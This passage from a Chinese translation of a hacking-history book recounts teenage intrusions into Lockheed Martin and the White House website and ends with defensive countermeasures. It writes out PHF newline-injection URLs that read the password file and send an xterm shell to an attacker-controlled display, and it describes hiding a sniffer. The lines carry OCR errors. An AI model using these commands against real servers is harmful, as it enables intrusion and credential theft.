neOh是少数几个幸存者之一。因为自己身处远方,他得以保全,但他被激怒了,他改写了网页,还在上面贴了一段话:“FBI的小子们,你们听好了。不用为难我们的成员,你们就要被打败了。现在FBI的官方网站也在我们手中。而你们会为此难受的。你们抓了我们这么多人,是因为你们这帮白痴找不到真正的入侵者……我说得没错吧?所以你们试图将我们全抓起来,看看我们当中有没有叛徒,向你们告密。我们不会投降的!明白吗?整个世界都要听我们的!”然后署上自己的大名:“无情的,neOh。”
2.5.4结局
为什么碰巧系统管理员那天那么早就在网上进行“嗅探”呢? Zyklon对此没有疑问。当检察官给案子拟定草稿文件时,Zyklon在当中发现了一条信息,信息显示有人向FBI告密说globaLheLL将入侵白宫网站。并且他还记得,文件当中好像说这个告密者身居印度的新德里。
在Zyklon看来,一切都没有疑问了。他只跟一个人讲过入侵白宫的事情——唯一的一个局外知情者 就是Khalid Ibrahim。事情已经水落石出:Khalid就是向FBI告密的人。
但事情仍然是疑团重重。即使Zyklon认为的是正确的,但整个故事就是这样吗? Khalid是个告密者,帮FBI探员找出这些意欲入侵重要网站的少年黑客吗?亦或还有别的解释:他的告密者身份只是故事的一半,事实上他也是印度将军所声称的巴基斯坦恐怖分子。一人同时扮演两种角色,既帮助塔利班集团,同时又渗透进FBI。
当然,他担心某个孩子会将他报告给FBI也符合这个故事的说法。只有几个人知道事情的真相。但问题是,被牵涉到的检察官和FBI探员,究竟谁真正了解这个故事。或者是他们也被愚弄了?
后来,Patrie Gregory和Chad Davis被判处26个月的监禁,Zyklon Bums被判15个月。现在他们三个都已服刑期满,出狱了。
2.5.5 5年以后
那些入侵的日子对Comrade来说只剩下回忆,但当谈起“入侵的刺激,能做别人不让你做的事情,能去别人不让你去的地方,希望能不期而遇一些炫酷的东西”时,Comrade的声音变得充满活力。
是该考虑一下生活的时候了。他说他正在考虑上大学。在我们进行采访时,他刚从以色列考察学校回来。语言不会是太大的障碍——他在小学学过希伯来语,他很惊讶自己居然还记得那么多。
他对那个国家的印象很复杂。那里的女孩真的漂亮迷人,并且以色列的人民对美国的印象很好。“他们很尊敬美国人。”比如,他遇到一个以色列朋友正在喝饮料,那种饮料他从没听说过,叫RC可乐,事后发现那是一种美国产品。这位以色列朋友跟他解释说,“商品,还是美国的好。”他还说道:“也有一些反美群体 他们不太认同美国的政治观点”,但又补充说,“我想,这样的事情你在哪里都会
遇到。”
他讨厌那里的气候——他在那里的时候“天气阴冷潮湿”。除此之外,还有一个计算机的问题。他特意为了这趟“旅行”买了一台笔记本电脑和无线上网装置 但是后来却发现:“那些大楼都是用厚重的大石块砌成的。”他的计算机只能看到5到10个网络,而且信号微弱,难以连接。需要走20分钟才能找到一个可以登录的地方。
Comrade也回到了迈阿密。未成年时,他就在司法部门的刑事犯罪登记表上有了重罪记录。现在他靠着继承的遗产度日,并设法上大学。他现在20岁了,也没干什么实事。
Comrade的老朋友neOh在一家电信公司干活(他本人表示,这种朝九晚五的工作也没有什么意思),但他马上就会到洛杉矶干上三个月的体力活,因为工资比目前所干的活高出很多。
加入到主流社会后,他希望自己能存到一笔钱,作为自己目前居住社区的房子的定金。
当三个月的苦差结束后,neOh也想去上大学一但不是去学计算机。“我所遇到的拥有计算机文凭的人都是狗屎”,他说。相反,他想去学工商管理,然后在商业领域从事一些计算机工作。
我们又谈到了他当年开始进行计算机探索时的Kevin偶像。他究竟想在多大程度上步我的后尘呢?
我想被别人发现吗?我又想又不想。如果被发现就证明了: “我能做这个,我做到了。”但这并不意味着我存心想被抓起来。我只是想如果被发现,我可以与他们进行斗争,我没事的。我将成为那种能成功逃脱的黑客。我将完全逃脱,然后在政府部门谋得一份好工作,并且我将干好地下黑客工作。
2.5.6到底有多刺激
铁了心的恐怖分子和无畏的少年黑客结合在一起,对一个国家来说,是一场灾难。这个故事不禁让我想到,还有多少“Khalid”式的人物在招募这些孩子啊(或者还包括一些不爱国的成人)!他们或是财迷心窍,或是想以这种方式证明自己,或是想从这种挑战中获得一种满足感。“后Khalid式的招募者”也许会隐藏得更好,更不易被发现。
当我在审判前的拘留过程中,正在等待有关非法入侵的指控时,一个哥伦比亚的大毒枭找过我好几回。他将在联邦监狱度过余生,没有获释的可能。他想跟我做个交易:他将给我5 000 000美元现金,条件是入侵“岗哨”——联邦监狱局计算机系统,并帮他越狱成功。这个家伙真是个危险人物。我没有答应他,但我给他留下将在暗中帮助他的印象。我在想当neOh处在这样的情况下,他会干些
什么。
我们的敌人也许正在加紧训练他们的士兵关于网络大战的艺术,以攻击我们的基础设施和保卫自己。毫无疑问,这些组织还会从世界各地招兵买马,训练他们,然后给他们委派重要的任务。
1997和2003年国防部两次发起Operation Eligible Receiver行动,通过努力来测试整个国家的网络系统的脆弱性。《华盛顿邮报》报道了这些努力的前期情况:“一场军事演习表明,美国的军用或民用计算机系统非常脆弱,很容易遭受非法入侵。对此,一位资深的五角大楼官员表示震惊。”这篇报道进一步揭示,国家安全局召集了一批计算机专家组成“红队”黑客,只允许他们使用一般的大众化的计算机设备;但可以使用任何入侵方法 包括开放的源代码;他们还可以从Internet和电子布告栏下载资料。
仅用了几天时间,红队黑客就渗透到国家计算机系统,掌控了好几个地区的电力格局,并且用一串命令就能使这些地方在夜里摸黑。“如果这次不是演习,而是真正的入侵,”《基督科学观察报》报道,“他们就已经将国防部的通信系统给破坏掉了(美国太平洋司令部的系统受损最严重),并能访问海军部门的计算机系统,登上海军的那条型巨舰了。”
在我自己的经历中,我曾经破坏了好些“小贝尔”公司的安全机制,控制了一些电话交换机的连接。10年前,太平洋贝尔、Sprint、GTE和其他一些电话公司的绝大多数电话交换机都完全在我的掌控中。设想一下,如果一个足智多谋的恐怖组织也能掌控这么多,用这种方式来报复我们,那将制造多么大的混乱啊!
Al Qaeda和其他一些恐怖组织的成员也曾试过用计算机入侵来计划恐怖行动。根据证据显示,恐怖分子利用Internet来部署他们的9 • 11劫机行动。
就算Khalid Ibrahim成功地从一位少年黑客身上获取了信息,但没有人会站出来承认。就算他真的与撞击世贸大楼和五角大楼有关,但仍缺少可靠的证据。
现在没人知道Khalid或其同类何时会在这个虚拟世界出现,引诱那些追求刺激的天真的少年“做一些不能做的事情,去一些禁止去的地方”。孩子们只会觉得这种挑战很“刺激”。
对这些年少的黑客而言,脆弱的安全体系犹如频频发出的入侵邀请函。然而,在这个故事中,这些孩子应该能意识到隐藏的危险,对于一位外国人召集他们攻击美国的机密计算机网络,应该有所警觉。我在想,有多少neOh已被我们的敌人俘获了。
在我们今天这样一个恐怖主义盛行的世界,“安全”二字怎样强调都不为过。
2.6启不
neOh向我们描述了他入侵Lockheed Martin计算机系统的详细经过。这个故事既是黑客洗心革面的誓词(过去他们的格言是“如果有漏洞,我们就会发起攻击”) 对每个组织而言,又是一次警示。
他很快发现Lockheed使用的是自己的域名服务器(DNS)。DNS 就是一种Internet协议,比如www.disney.com翻译成198.187.189.55 翻译后的地址可用来路由消息包。neOh知道,波兰的一个安全研究组织已将一个黑客称为exploit的方式公布出来了一那是为攻击某个漏洞而特意编写的一个程序——他就可以利用这个程序来攻击Lockheed运行的DNS 了。
这家公司使用的是DNS协议的一个执行程序BIND(Berkeley Internet NameDomain)o这个波兰组织发现BIND有一个版本特别容易遭受涉及远程缓冲器溢出的攻击,而Lockheed使用的正是这个版本。按照自己在网上搜索到的方法,neOh能够在主DNS服务器和次级DNS服务器上获得根用户权限。
获得根用户权限后,neOh通过安装一个嗅探器一就像一个计算机上的窃听装置一就开始拦截口令和电子邮件了。任何通过线路的通信都被偷偷地捕获了;黑客通常将捕获的信息存放在一个不易被察觉的地方。为隐藏自己的嗅探器,neOh说,他创建了一个目录,上面的名字仅代表一个空间,用三个点来表示;他实际使用的路径是“/var/adm/…”,如果仅是简单的检查,系统管理员通常会忽略
这个不起眼的条目。
这种隐藏嗅探程序使用的技术非常简单,虽然它在很多情况下都发挥了作用。更复杂的掩盖黑客踪迹的技术一般在这种场合下使用。
在找出自己能否进一步渗透Lockheedd Martin以及获得该公司的机密信息之前,neOh将自己的注意力集中到另一项任务上面去了。这时,Lockheed Martin的敏感文件还是安全的。
Zyklon说,为了攻击白宫网站,他一开始就安装了公共网关接口(CommonGateway Interface CGI)扫描器的程序,可用它来扫描目标系统,从而找出CGI的漏洞。他发现使用PHF exploit 网站很容易遭受攻击,因为可以利用开发PHF脚本的程序员的错误。
PHF是一种基于表单的界面,它接受姓名作为输入,然后在服务器上查找这个姓名及其地址。这个脚本调用escape_shell_cmd()函数,用来对输入项中的所有特殊字符进行合法检测。但程序设计者在他的列表中遗漏了一个字符——换行字符。富有见识的黑客能够利用这个疏漏,通过输入一串包含换行字符的字符串,就能欺骗脚本去执行任何他们想要执行的命令了。
Zyklon在浏览器里输入了一个URL:
http://www.whitehouse.gov/cgi-bin/phf?Qalisa=x%Oa/
bin/cat /ect/passwd
用这个,他就能将白宫政府网站的口令文件显示出来。但他想完全控制白宫网站服务器。他知道这些X服务器的端口很可能被防火墙阻断了,他将不能连接到白宫政府网站的任何服务。所以,他没有使用那种方法,而是再次利用这个PHF漏洞,输入这个地址:
http://www.whitehouse・gov/cgi-bin/phf?Qalias=x%Oa/
usr/XIlR6/bin/xterm -ut -display zyklons.ip.address:0.0
这样就使白宫服务器的X终端仿真(xterm)发送到了处于他控制下的运行X服务器的计算机上。这就意味着,他不必自己去连接白宫政府网站,事实上,他已经在命令白宫的网站系统来主动连接他了(这只有当防火墙允许对外连接时,才有可能发生。而故事中显然正是这种情况)。
然后他利用了系统程序中的一个缓冲器溢出漏洞——ufsrestore。Zyklon说,这使他能以根用户方式访问白宫政府网站,以及白宫的邮件服务器和网络上的其他系统。
2.7对策
针对neOh和Comrade所用的方法,在这里为所有公司提供两种解决方案。
第一个很简单,大家都很熟悉:就是始终保持操作系统和应用程序是软件供应商发布的最新版本。始终保持警惕,记得随时更新和安装与安全相关的补丁。但要确保这一切不能毫无目的地进行,所有公司都应该开发和执行一项补丁管理程序,当公司所用的产品发行新补丁的时候,公司内部与此补丁相关的人员就会收到通知——主要是针对操作系统,但也有应用程序软件和固件。
当可以获得新的补丁时,一定要尽快安装——马上!除非这个补丁干扰了公司的运作;否则应该在第一时间安装。不难想象,有时疲惫的员工会因为工作压力而仅将目光锁定在容易注意到的项目上(比如,仅给新员工安装系统),而且总认为补丁只要在实效范围内安装就行。但如果这些未安装补丁的设备可以从Internet上面公开访问的话,那将招致巨大的风险。
因为缺少补丁管理,不计其数的系统惨遭攻击。一旦一个脆弱点被公开,这个脆弱点会迅速增大,直到软件服务商发行了针对这个问题的补丁,并且客户将它安装上了。
你们的机构都需要优先考虑补丁安装,采用一项正式的补丁管理措施,最大限度地减少漏洞的暴露一当然是在考虑不干扰重要商业运作的前提下。
但仅仅紧密注意安装补丁程序还不够。neOh说了,有时自己的入侵是在“零天”(zero-day)的时间内完成的 这种入侵建立在攻击少数黑客知道漏洞的基础上,除了他们自己这个小黑客团体,别人尚未发现这个漏洞。“零天”指的是,从漏洞被发现到软件商家和安全团体发现之间的这段时间。
因为有被利用“零天”攻击的可能,每个使用存在漏洞的产品的机构都是脆弱的,直到补丁发行出来为止。因此你怎样降低暴露过程中的风险呢?
我认为,唯一可行的办法是使用深度防御模型(defense in depth)。我们必须假设,能从公共领域访问的计算机系统在某些时刻具有遭受“零天”攻击的危险性。因此我们必须创建一个环境,将破坏者可能造成的破坏程度降至最低。比如,就如前文所提到的那样,将公众可访问的系统置于公司防火墙的“非军事区”(Demilitarized Zone DMZ)O DMZ是从军事或政治领域借用的词语,指的是建立一个网络结构,以此将公众访问的系统(如网络服务器、邮件服务器、DNS服务器以及其他类似的东西)与公司网络的敏感系统分来。配置一个网络结构以此来保护内部网络,这是“深度防御”的一个例子。通过这种设置,即使黑客发现了一个事先不知道的漏洞,接着网络服务器和邮件服务器遭到了破坏,公司的内部网络系统仍处于另一个层面的保护中。
公司还可以启用另一种有效的对策:监视网络或观察单个主机,看是否有异样的令人生疑的现象。通常黑客成功入侵一个系统后,他们都会采取某些进一步的动作,比如试着攻击加密的口令或明文口令,安装一个后门程序,修改配置文件来降低安全性,或者修改系统、应用程序或日志文件等。在适当的地方安放一个程序,可以监视这些典型的黑客行为,并且可以提醒相关的工作人员予以注意 从而帮助控制危险。
因为另外一个话题,我被媒体采访了无数次。他们问我,在今天这样非常不友好的环境下,什么才是保护自己的业务和个人计算机资源的最佳办法。我的一个最基本的建议就是使用复杂的交互式口令,而不是静态口令。除非事情己经发生,不然你永远不会想到别人会获得你的口令。
许多二级签名技术可与传统的口令结合起来使用,这样将极大地提高系统的安全性。除了 RSA的安全验证码(前面提到过),SafeWordPremierAccess提供了口令生成令牌、数字证书、智能卡、生物认证以及其他一些技术。
但使用这些认证控制方法也有一些副作用,比如成本增加、使用不便等。这得看你的保护对象是什么了。《LA时报》网站使用静态口令也许就足够保护它的新闻了。但你还会使用静态口令来保护最新的商用喷气飞机的设计规范吗?
2.8小结
本书讲述的故事和媒体上报道的故事,都说明我们国家的计算机系统不安全,我们在攻击面前都显得非常脆弱。几乎没有哪个系统是固若金汤的。
在这个恐怖主义横行的时代,我们需要做更多的工作来修补我们的漏洞。这个故事中的插曲让我们不得不面对这个问题:我们这些不懂事的孩子们的聪明才智多么容易被人利用来危害自己的社会啊!我认为当孩子们在小学阶段学习计算机设计课程时,就应该培养他们的计算机道德。
最近我听了大片Catch Me If You Can中主角扮演者Frank Abagnale的报告。他面向全国高中生做了一项关于计算机道德的调查。学生们都被问及关于攻击自己同学的口令的行为的态度。令人惊讶的是,接受调查的48%的学生都认为这没什么。持这样的态度,就不难理解他们怎么会牵涉进这种事情当中了。
如果任何人有好的建议,能让孩子们变得不那么容易被敌人收买——无论是内敌还是外患,就请大声讲出来吧,让大家都能了解到。